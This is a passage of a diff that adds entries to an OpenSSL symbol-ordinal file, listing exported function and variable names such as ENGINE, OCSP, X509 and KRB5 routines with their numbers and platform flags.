+BIO_vprintf                             2443	EXIST::FUNCTION:
+BIO_vsnprintf                           2444	EXIST::FUNCTION:
+d2i_PUBKEY_fp                           2445	EXIST::FUNCTION:FP_API
+X509_cmp_time                           2446	EXIST::FUNCTION:
+X509_STORE_CTX_set_time                 2447	EXIST::FUNCTION:
+X509_STORE_CTX_get1_issuer              2448	EXIST::FUNCTION:
+X509_OBJECT_retrieve_match              2449	EXIST::FUNCTION:
+X509_OBJECT_idx_by_subject              2450	EXIST::FUNCTION:
+X509_STORE_CTX_set_flags                2451	EXIST::FUNCTION:
+X509_STORE_CTX_trusted_stack            2452	EXIST::FUNCTION:
+X509_time_adj                           2453	EXIST::FUNCTION:
+X509_check_issued                       2454	EXIST::FUNCTION:
+ASN1_UTCTIME_cmp_time_t                 2455	EXIST::FUNCTION:
+DES_set_weak_key_flag                   2456	NOEXIST::FUNCTION:
+DES_check_key                           2457	NOEXIST::FUNCTION:
+DES_rw_mode                             2458	NOEXIST::FUNCTION:
+RSA_PKCS1_RSAref                        2459	NOEXIST::FUNCTION:
+X509_keyid_set1                         2460	EXIST::FUNCTION:
+BIO_next                                2461	EXIST::FUNCTION:
+DSO_METHOD_vms                          2462	EXIST::FUNCTION:
+BIO_f_linebuffer                        2463	EXIST:VMS:FUNCTION:
+BN_bntest_rand                          2464	EXIST::FUNCTION:
+OPENSSL_issetugid                       2465	EXIST::FUNCTION:
+BN_rand_range                           2466	EXIST::FUNCTION:
+ERR_load_ENGINE_strings                 2467	EXIST::FUNCTION:ENGINE
+ENGINE_set_DSA                          2468	EXIST::FUNCTION:ENGINE
+ENGINE_get_finish_function              2469	EXIST::FUNCTION:ENGINE
+ENGINE_get_default_RSA                  2470	EXIST::FUNCTION:ENGINE
+ENGINE_get_BN_mod_exp                   2471	NOEXIST::FUNCTION:
+DSA_get_default_openssl_method          2472	NOEXIST::FUNCTION:
+ENGINE_set_DH                           2473	EXIST::FUNCTION:ENGINE
+ENGINE_set_def_BN_mod_exp_crt           2474	NOEXIST::FUNCTION:
+ENGINE_set_default_BN_mod_exp_crt       2474	NOEXIST::FUNCTION:
+ENGINE_init                             2475	EXIST::FUNCTION:ENGINE
+DH_get_default_openssl_method           2476	NOEXIST::FUNCTION:
+RSA_set_default_openssl_method          2477	NOEXIST::FUNCTION:
+ENGINE_finish                           2478	EXIST::FUNCTION:ENGINE
+ENGINE_load_public_key                  2479	EXIST::FUNCTION:ENGINE
+ENGINE_get_DH                           2480	EXIST::FUNCTION:ENGINE
+ENGINE_ctrl                             2481	EXIST::FUNCTION:ENGINE
+ENGINE_get_init_function                2482	EXIST::FUNCTION:ENGINE
+ENGINE_set_init_function                2483	EXIST::FUNCTION:ENGINE
+ENGINE_set_default_DSA                  2484	EXIST::FUNCTION:ENGINE
+ENGINE_get_name                         2485	EXIST::FUNCTION:ENGINE
+ENGINE_get_last                         2486	EXIST::FUNCTION:ENGINE
+ENGINE_get_prev                         2487	EXIST::FUNCTION:ENGINE
+ENGINE_get_default_DH                   2488	EXIST::FUNCTION:ENGINE
+ENGINE_get_RSA                          2489	EXIST::FUNCTION:ENGINE
+ENGINE_set_default                      2490	EXIST::FUNCTION:ENGINE
+ENGINE_get_RAND                         2491	EXIST::FUNCTION:ENGINE
+ENGINE_get_first                        2492	EXIST::FUNCTION:ENGINE
+ENGINE_by_id                            2493	EXIST::FUNCTION:ENGINE
+ENGINE_set_finish_function              2494	EXIST::FUNCTION:ENGINE
+ENGINE_get_def_BN_mod_exp_crt           2495	NOEXIST::FUNCTION:
+ENGINE_get_default_BN_mod_exp_crt       2495	NOEXIST::FUNCTION:
+RSA_get_default_openssl_method          2496	NOEXIST::FUNCTION:
+ENGINE_set_RSA                          2497	EXIST::FUNCTION:ENGINE
+ENGINE_load_private_key                 2498	EXIST::FUNCTION:ENGINE
+ENGINE_set_default_RAND                 2499	EXIST::FUNCTION:ENGINE
+ENGINE_set_BN_mod_exp                   2500	NOEXIST::FUNCTION:
+ENGINE_remove                           2501	EXIST::FUNCTION:ENGINE
+ENGINE_free                             2502	EXIST::FUNCTION:ENGINE
+ENGINE_get_BN_mod_exp_crt               2503	NOEXIST::FUNCTION:
+ENGINE_get_next                         2504	EXIST::FUNCTION:ENGINE
+ENGINE_set_name                         2505	EXIST::FUNCTION:ENGINE
+ENGINE_get_default_DSA                  2506	EXIST::FUNCTION:ENGINE
+ENGINE_set_default_BN_mod_exp           2507	NOEXIST::FUNCTION:
+ENGINE_set_default_RSA                  2508	EXIST::FUNCTION:ENGINE
+ENGINE_get_default_RAND                 2509	EXIST::FUNCTION:ENGINE
+ENGINE_get_default_BN_mod_exp           2510	NOEXIST::FUNCTION:
+ENGINE_set_RAND                         2511	EXIST::FUNCTION:ENGINE
+ENGINE_set_id                           2512	EXIST::FUNCTION:ENGINE
+ENGINE_set_BN_mod_exp_crt               2513	NOEXIST::FUNCTION:
+ENGINE_set_default_DH                   2514	EXIST::FUNCTION:ENGINE
+ENGINE_new                              2515	EXIST::FUNCTION:ENGINE
+ENGINE_get_id                           2516	EXIST::FUNCTION:ENGINE
+DSA_set_default_openssl_method          2517	NOEXIST::FUNCTION:
+ENGINE_add                              2518	EXIST::FUNCTION:ENGINE
+DH_set_default_openssl_method           2519	NOEXIST::FUNCTION:
+ENGINE_get_DSA                          2520	EXIST::FUNCTION:ENGINE
+ENGINE_get_ctrl_function                2521	EXIST::FUNCTION:ENGINE
+ENGINE_set_ctrl_function                2522	EXIST::FUNCTION:ENGINE
+BN_pseudo_rand_range                    2523	EXIST::FUNCTION:
+X509_STORE_CTX_set_verify_cb            2524	EXIST::FUNCTION:
+ERR_load_COMP_strings                   2525	EXIST::FUNCTION:
+PKCS12_item_decrypt_d2i                 2526	EXIST::FUNCTION:
+ASN1_UTF8STRING_it                      2527	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_UTF8STRING_it                      2527	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ENGINE_unregister_ciphers               2528	EXIST::FUNCTION:ENGINE
+ENGINE_get_ciphers                      2529	EXIST::FUNCTION:ENGINE
+d2i_OCSP_BASICRESP                      2530	EXIST::FUNCTION:
+KRB5_CHECKSUM_it                        2531	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+KRB5_CHECKSUM_it                        2531	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EC_POINT_add                            2532	EXIST::FUNCTION:EC
+ASN1_item_ex_i2d                        2533	EXIST::FUNCTION:
+OCSP_CERTID_it                          2534	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_CERTID_it                          2534	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+d2i_OCSP_RESPBYTES                      2535	EXIST::FUNCTION:
+X509V3_add1_i2d                         2536	EXIST::FUNCTION:
+PKCS7_ENVELOPE_it                       2537	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS7_ENVELOPE_it                       2537	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+UI_add_input_boolean                    2538	EXIST::FUNCTION:
+ENGINE_unregister_RSA                   2539	EXIST::FUNCTION:ENGINE
+X509V3_EXT_nconf                        2540	EXIST::FUNCTION:
+ASN1_GENERALSTRING_free                 2541	EXIST::FUNCTION:
+d2i_OCSP_CERTSTATUS                     2542	EXIST::FUNCTION:
+X509_REVOKED_set_serialNumber           2543	EXIST::FUNCTION:
+X509_print_ex                           2544	EXIST::FUNCTION:BIO
+OCSP_ONEREQ_get1_ext_d2i                2545	EXIST::FUNCTION:
+ENGINE_register_all_RAND                2546	EXIST::FUNCTION:ENGINE
+ENGINE_load_dynamic                     2547	EXIST::FUNCTION:ENGINE
+PBKDF2PARAM_it                          2548	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PBKDF2PARAM_it                          2548	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EXTENDED_KEY_USAGE_new                  2549	EXIST::FUNCTION:
+EC_GROUP_clear_free                     2550	EXIST::FUNCTION:EC
+OCSP_sendreq_bio                        2551	EXIST::FUNCTION:
+ASN1_item_digest                        2552	EXIST::FUNCTION:EVP
+OCSP_BASICRESP_delete_ext               2553	EXIST::FUNCTION:
+OCSP_SIGNATURE_it                       2554	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_SIGNATURE_it                       2554	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+X509_CRL_it                             2555	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_CRL_it                             2555	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_BASICRESP_add_ext                  2556	EXIST::FUNCTION:
+KRB5_ENCKEY_it                          2557	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+KRB5_ENCKEY_it                          2557	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+UI_method_set_closer                    2558	EXIST::FUNCTION:
+X509_STORE_set_purpose                  2559	EXIST::FUNCTION:
+i2d_ASN1_GENERALSTRING                  2560	EXIST::FUNCTION:
+OCSP_response_status                    2561	EXIST::FUNCTION:
+i2d_OCSP_SERVICELOC                     2562	EXIST::FUNCTION:
+ENGINE_get_digest_engine                2563	EXIST::FUNCTION:ENGINE
+EC_GROUP_set_curve_GFp                  2564	EXIST::FUNCTION:EC
+OCSP_REQUEST_get_ext_by_OBJ             2565	EXIST::FUNCTION:
+_ossl_old_des_random_key                2566	EXIST::FUNCTION:DES
+ASN1_T61STRING_it                       2567	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_T61STRING_it                       2567	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EC_GROUP_method_of                      2568	EXIST::FUNCTION:EC
+i2d_KRB5_APREQ                          2569	EXIST::FUNCTION:
+_ossl_old_des_encrypt                   2570	EXIST::FUNCTION:DES
+ASN1_PRINTABLE_new                      2571	EXIST::FUNCTION:
+HMAC_Init_ex                            2572	EXIST::FUNCTION:HMAC
+d2i_KRB5_AUTHENT                        2573	EXIST::FUNCTION:
+OCSP_archive_cutoff_new                 2574	EXIST::FUNCTION:
+EC_POINT_set_Jprojective_coordinates_GFp 2575	EXIST:!VMS:FUNCTION:EC
+EC_POINT_set_Jproj_coords_GFp           2575	EXIST:VMS:FUNCTION:EC
+_ossl_old_des_is_weak_key               2576	EXIST::FUNCTION:DES
+OCSP_BASICRESP_get_ext_by_OBJ           2577	EXIST::FUNCTION:
+EC_POINT_oct2point                      2578	EXIST::FUNCTION:EC
+OCSP_SINGLERESP_get_ext_count           2579	EXIST::FUNCTION:
+UI_ctrl                                 2580	EXIST::FUNCTION:
+_shadow_DES_rw_mode                     2581	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:DES
+_shadow_DES_rw_mode                     2581	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:DES
+asn1_do_adb                             2582	EXIST::FUNCTION:
+ASN1_template_i2d                       2583	EXIST::FUNCTION:
+ENGINE_register_DH                      2584	EXIST::FUNCTION:ENGINE
+UI_construct_prompt                     2585	EXIST::FUNCTION:
+X509_STORE_set_trust                    2586	EXIST::FUNCTION:
+UI_dup_input_string                     2587	EXIST::FUNCTION:
+d2i_KRB5_APREQ                          2588	EXIST::FUNCTION:
+EVP_MD_CTX_copy_ex                      2589	EXIST::FUNCTION:
+OCSP_request_is_signed                  2590	EXIST::FUNCTION:
+i2d_OCSP_REQINFO                        2591	EXIST::FUNCTION:
+KRB5_ENCKEY_free                        2592	EXIST::FUNCTION:
+OCSP_resp_get0                          2593	EXIST::FUNCTION:
+GENERAL_NAME_it                         2594	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+GENERAL_NAME_it                         2594	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ASN1_GENERALIZEDTIME_it                 2595	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_GENERALIZEDTIME_it                 2595	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+X509_STORE_set_flags                    2596	EXIST::FUNCTION:
+EC_POINT_set_compressed_coordinates_GFp 2597	EXIST:!VMS:FUNCTION:EC
+EC_POINT_set_compr_coords_GFp           2597	EXIST:VMS:FUNCTION:EC
+OCSP_response_status_str                2598	EXIST::FUNCTION:
+d2i_OCSP_REVOKEDINFO                    2599	EXIST::FUNCTION:
+OCSP_basic_add1_cert                    2600	EXIST::FUNCTION:
+ERR_get_implementation                  2601	EXIST::FUNCTION:
+EVP_CipherFinal_ex                      2602	EXIST::FUNCTION:
+OCSP_CERTSTATUS_new                     2603	EXIST::FUNCTION:
+CRYPTO_cleanup_all_ex_data              2604	EXIST::FUNCTION:
+OCSP_resp_find                          2605	EXIST::FUNCTION:
+BN_nnmod                                2606	EXIST::FUNCTION:
+X509_CRL_sort                           2607	EXIST::FUNCTION:
+X509_REVOKED_set_revocationDate         2608	EXIST::FUNCTION:
+ENGINE_register_RAND                    2609	EXIST::FUNCTION:ENGINE
+OCSP_SERVICELOC_new                     2610	EXIST::FUNCTION:
+EC_POINT_set_affine_coordinates_GFp     2611	EXIST:!VMS:FUNCTION:EC
+EC_POINT_set_affine_coords_GFp          2611	EXIST:VMS:FUNCTION:EC
+_ossl_old_des_options                   2612	EXIST::FUNCTION:DES
+SXNET_it                                2613	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+SXNET_it                                2613	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+UI_dup_input_boolean                    2614	EXIST::FUNCTION:
+PKCS12_add_CSPName_asc                  2615	EXIST::FUNCTION:
+EC_POINT_is_at_infinity                 2616	EXIST::FUNCTION:EC
+ENGINE_load_cryptodev                   2617	EXIST::FUNCTION:ENGINE
+DSO_convert_filename                    2618	EXIST::FUNCTION:
+POLICYQUALINFO_it                       2619	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+POLICYQUALINFO_it                       2619	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ENGINE_register_ciphers                 2620	EXIST::FUNCTION:ENGINE
+BN_mod_lshift_quick                     2621	EXIST::FUNCTION:
+DSO_set_filename                        2622	EXIST::FUNCTION:
+ASN1_item_free                          2623	EXIST::FUNCTION:
+KRB5_TKTBODY_free                       2624	EXIST::FUNCTION:
+AUTHORITY_KEYID_it                      2625	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+AUTHORITY_KEYID_it                      2625	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+KRB5_APREQBODY_new                      2626	EXIST::FUNCTION:
+X509V3_EXT_REQ_add_nconf                2627	EXIST::FUNCTION:
+ENGINE_ctrl_cmd_string                  2628	EXIST::FUNCTION:ENGINE
+i2d_OCSP_RESPDATA                       2629	EXIST::FUNCTION:
+EVP_MD_CTX_init                         2630	EXIST::FUNCTION:
+EXTENDED_KEY_USAGE_free                 2631	EXIST::FUNCTION:
+PKCS7_ATTR_SIGN_it                      2632	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS7_ATTR_SIGN_it                      2632	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+UI_add_error_string                     2633	EXIST::FUNCTION:
+KRB5_CHECKSUM_free                      2634	EXIST::FUNCTION:
+OCSP_REQUEST_get_ext                    2635	EXIST::FUNCTION:
+ENGINE_load_ubsec                       2636	EXIST::FUNCTION:ENGINE,STATIC_ENGINE
+ENGINE_register_all_digests             2637	EXIST::FUNCTION:ENGINE
+PKEY_USAGE_PERIOD_it                    2638	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKEY_USAGE_PERIOD_it                    2638	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+PKCS12_unpack_authsafes                 2639	EXIST::FUNCTION:
+ASN1_item_unpack                        2640	EXIST::FUNCTION:
+NETSCAPE_SPKAC_it                       2641	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+NETSCAPE_SPKAC_it                       2641	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+X509_REVOKED_it                         2642	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_REVOKED_it                         2642	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ASN1_STRING_encode                      2643	NOEXIST::FUNCTION:
+EVP_aes_128_ecb                         2644	EXIST::FUNCTION:AES
+KRB5_AUTHENT_free                       2645	EXIST::FUNCTION:
+OCSP_BASICRESP_get_ext_by_critical      2646	EXIST:!VMS:FUNCTION:
+OCSP_BASICRESP_get_ext_by_crit          2646	EXIST:VMS:FUNCTION:
+OCSP_cert_status_str                    2647	EXIST::FUNCTION:
+d2i_OCSP_REQUEST                        2648	EXIST::FUNCTION:
+UI_dup_info_string                      2649	EXIST::FUNCTION:
+_ossl_old_des_xwhite_in2out             2650	NOEXIST::FUNCTION:
+PKCS12_it                               2651	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS12_it                               2651	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_SINGLERESP_get_ext_by_critical     2652	EXIST:!VMS:FUNCTION:
+OCSP_SINGLERESP_get_ext_by_crit         2652	EXIST:VMS:FUNCTION:
+OCSP_CERTSTATUS_free                    2653	EXIST::FUNCTION:
+_ossl_old_des_crypt                     2654	EXIST::FUNCTION:DES
+ASN1_item_i2d                           2655	EXIST::FUNCTION:
+EVP_DecryptFinal_ex                     2656	EXIST::FUNCTION:
+ENGINE_load_openssl                     2657	EXIST::FUNCTION:ENGINE
+ENGINE_get_cmd_defns                    2658	EXIST::FUNCTION:ENGINE
+ENGINE_set_load_privkey_function        2659	EXIST:!VMS:FUNCTION:ENGINE
+ENGINE_set_load_privkey_fn              2659	EXIST:VMS:FUNCTION:ENGINE
+EVP_EncryptFinal_ex                     2660	EXIST::FUNCTION:
+ENGINE_set_default_digests              2661	EXIST::FUNCTION:ENGINE
+X509_get0_pubkey_bitstr                 2662	EXIST::FUNCTION:
+asn1_ex_i2c                             2663	EXIST::FUNCTION:
+ENGINE_register_RSA                     2664	EXIST::FUNCTION:ENGINE
+ENGINE_unregister_DSA                   2665	EXIST::FUNCTION:ENGINE
+_ossl_old_des_key_sched                 2666	EXIST::FUNCTION:DES
+X509_EXTENSION_it                       2667	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_EXTENSION_it                       2667	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+i2d_KRB5_AUTHENT                        2668	EXIST::FUNCTION:
+SXNETID_it                              2669	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+SXNETID_it                              2669	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+d2i_OCSP_SINGLERESP                     2670	EXIST::FUNCTION:
+EDIPARTYNAME_new                        2671	EXIST::FUNCTION:
+PKCS12_certbag2x509                     2672	EXIST::FUNCTION:
+_ossl_old_des_ofb64_encrypt             2673	EXIST::FUNCTION:DES
+d2i_EXTENDED_KEY_USAGE                  2674	EXIST::FUNCTION:
+ERR_print_errors_cb                     2675	EXIST::FUNCTION:
+ENGINE_set_ciphers                      2676	EXIST::FUNCTION:ENGINE
+d2i_KRB5_APREQBODY                      2677	EXIST::FUNCTION:
+UI_method_get_flusher                   2678	EXIST::FUNCTION:
+X509_PUBKEY_it                          2679	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_PUBKEY_it                          2679	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+_ossl_old_des_enc_read                  2680	EXIST::FUNCTION:DES
+PKCS7_ENCRYPT_it                        2681	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS7_ENCRYPT_it                        2681	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+i2d_OCSP_RESPONSE                       2682	EXIST::FUNCTION:
+EC_GROUP_get_cofactor                   2683	EXIST::FUNCTION:EC
+PKCS12_unpack_p7data                    2684	EXIST::FUNCTION:
+d2i_KRB5_AUTHDATA                       2685	EXIST::FUNCTION:
+OCSP_copy_nonce                         2686	EXIST::FUNCTION:
+KRB5_AUTHDATA_new                       2687	EXIST::FUNCTION:
+OCSP_RESPDATA_new                       2688	EXIST::FUNCTION:
+EC_GFp_mont_method                      2689	EXIST::FUNCTION:EC
+OCSP_REVOKEDINFO_free                   2690	EXIST::FUNCTION:
+UI_get_ex_data                          2691	EXIST::FUNCTION:
+KRB5_APREQBODY_free                     2692	EXIST::FUNCTION:
+EC_GROUP_get0_generator                 2693	EXIST::FUNCTION:EC
+UI_get_default_method                   2694	EXIST::FUNCTION:
+X509V3_set_nconf                        2695	EXIST::FUNCTION:
+PKCS12_item_i2d_encrypt                 2696	EXIST::FUNCTION:
+X509_add1_ext_i2d                       2697	EXIST::FUNCTION:
+PKCS7_SIGNER_INFO_it                    2698	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS7_SIGNER_INFO_it                    2698	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+KRB5_PRINCNAME_new                      2699	EXIST::FUNCTION:
+PKCS12_SAFEBAG_it                       2700	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS12_SAFEBAG_it                       2700	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EC_GROUP_get_order                      2701	EXIST::FUNCTION:EC
+d2i_OCSP_RESPID                         2702	EXIST::FUNCTION:
+OCSP_request_verify                     2703	EXIST::FUNCTION:
+NCONF_get_number_e                      2704	EXIST::FUNCTION:
+_ossl_old_des_decrypt3                  2705	EXIST::FUNCTION:DES
+X509_signature_print                    2706	EXIST::FUNCTION:EVP
+OCSP_SINGLERESP_free                    2707	EXIST::FUNCTION:
+ENGINE_load_builtin_engines             2708	EXIST::FUNCTION:ENGINE
+i2d_OCSP_ONEREQ                         2709	EXIST::FUNCTION:
+OCSP_REQUEST_add_ext                    2710	EXIST::FUNCTION:
+OCSP_RESPBYTES_new                      2711	EXIST::FUNCTION:
+EVP_MD_CTX_create                       2712	EXIST::FUNCTION:
+OCSP_resp_find_status                   2713	EXIST::FUNCTION:
+X509_ALGOR_it                           2714	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_ALGOR_it                           2714	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ASN1_TIME_it                            2715	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_TIME_it                            2715	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_request_set1_name                  2716	EXIST::FUNCTION:
+OCSP_ONEREQ_get_ext_count               2717	EXIST::FUNCTION:
+UI_get0_result                          2718	EXIST::FUNCTION:
+PKCS12_AUTHSAFES_it                     2719	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS12_AUTHSAFES_it                     2719	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EVP_aes_256_ecb                         2720	EXIST::FUNCTION:AES
+PKCS12_pack_authsafes                   2721	EXIST::FUNCTION:
+ASN1_IA5STRING_it                       2722	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_IA5STRING_it                       2722	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+UI_get_input_flags                      2723	EXIST::FUNCTION:
+EC_GROUP_set_generator                  2724	EXIST::FUNCTION:EC
+_ossl_old_des_string_to_2keys           2725	EXIST::FUNCTION:DES
+OCSP_CERTID_free                        2726	EXIST::FUNCTION:
+X509_CERT_AUX_it                        2727	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_CERT_AUX_it                        2727	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+CERTIFICATEPOLICIES_it                  2728	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+CERTIFICATEPOLICIES_it                  2728	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+_ossl_old_des_ede3_cbc_encrypt          2729	EXIST::FUNCTION:DES
+RAND_set_rand_engine                    2730	EXIST::FUNCTION:ENGINE
+DSO_get_loaded_filename                 2731	EXIST::FUNCTION:
+X509_ATTRIBUTE_it                       2732	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_ATTRIBUTE_it                       2732	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_ONEREQ_get_ext_by_NID              2733	EXIST::FUNCTION:
+PKCS12_decrypt_skey                     2734	EXIST::FUNCTION:
+KRB5_AUTHENT_it                         2735	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+KRB5_AUTHENT_it                         2735	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+UI_dup_error_string                     2736	EXIST::FUNCTION:
+RSAPublicKey_it                         2737	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:RSA
+RSAPublicKey_it                         2737	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:RSA
+i2d_OCSP_REQUEST                        2738	EXIST::FUNCTION:
+PKCS12_x509crl2certbag                  2739	EXIST::FUNCTION:
+OCSP_SERVICELOC_it                      2740	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_SERVICELOC_it                      2740	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ASN1_item_sign                          2741	EXIST::FUNCTION:EVP
+X509_CRL_set_issuer_name                2742	EXIST::FUNCTION:
+OBJ_NAME_do_all_sorted                  2743	EXIST::FUNCTION:
+i2d_OCSP_BASICRESP                      2744	EXIST::FUNCTION:
+i2d_OCSP_RESPBYTES                      2745	EXIST::FUNCTION:
+PKCS12_unpack_p7encdata                 2746	EXIST::FUNCTION:
+HMAC_CTX_init                           2747	EXIST::FUNCTION:HMAC
+ENGINE_get_digest                       2748	EXIST::FUNCTION:ENGINE
+OCSP_RESPONSE_print                     2749	EXIST::FUNCTION:
+KRB5_TKTBODY_it                         2750	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+KRB5_TKTBODY_it                         2750	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ACCESS_DESCRIPTION_it                   2751	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ACCESS_DESCRIPTION_it                   2751	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+PKCS7_ISSUER_AND_SERIAL_it              2752	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS7_ISSUER_AND_SERIAL_it              2752	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+PBE2PARAM_it                            2753	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PBE2PARAM_it                            2753	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+PKCS12_certbag2x509crl                  2754	EXIST::FUNCTION:
+PKCS7_SIGNED_it                         2755	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS7_SIGNED_it                         2755	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ENGINE_get_cipher                       2756	EXIST::FUNCTION:ENGINE
+i2d_OCSP_CRLID                          2757	EXIST::FUNCTION:
+OCSP_SINGLERESP_new                     2758	EXIST::FUNCTION:
+ENGINE_cmd_is_executable                2759	EXIST::FUNCTION:ENGINE
+RSA_up_ref                              2760	EXIST::FUNCTION:RSA
+ASN1_GENERALSTRING_it                   2761	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_GENERALSTRING_it                   2761	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ENGINE_register_DSA                     2762	EXIST::FUNCTION:ENGINE
+X509V3_EXT_add_nconf_sk                 2763	EXIST::FUNCTION:
+ENGINE_set_load_pubkey_function         2764	EXIST::FUNCTION:ENGINE
+PKCS8_decrypt                           2765	EXIST::FUNCTION:
+PEM_bytes_read_bio                      2766	EXIST::FUNCTION:BIO
+DIRECTORYSTRING_it                      2767	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+DIRECTORYSTRING_it                      2767	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+d2i_OCSP_CRLID                          2768	EXIST::FUNCTION:
+EC_POINT_is_on_curve                    2769	EXIST::FUNCTION:EC
+CRYPTO_set_locked_mem_ex_functions      2770	EXIST:!VMS:FUNCTION:
+CRYPTO_set_locked_mem_ex_funcs          2770	EXIST:VMS:FUNCTION:
+d2i_KRB5_CHECKSUM                       2771	EXIST::FUNCTION:
+ASN1_item_dup                           2772	EXIST::FUNCTION:
+X509_it                                 2773	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_it                                 2773	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+BN_mod_add                              2774	EXIST::FUNCTION:
+KRB5_AUTHDATA_free                      2775	EXIST::FUNCTION:
+_ossl_old_des_cbc_cksum                 2776	EXIST::FUNCTION:DES
+ASN1_item_verify                        2777	EXIST::FUNCTION:EVP
+CRYPTO_set_mem_ex_functions             2778	EXIST::FUNCTION:
+EC_POINT_get_Jprojective_coordinates_GFp 2779	EXIST:!VMS:FUNCTION:EC
+EC_POINT_get_Jproj_coords_GFp           2779	EXIST:VMS:FUNCTION:EC
+ZLONG_it                                2780	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ZLONG_it                                2780	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+CRYPTO_get_locked_mem_ex_functions      2781	EXIST:!VMS:FUNCTION:
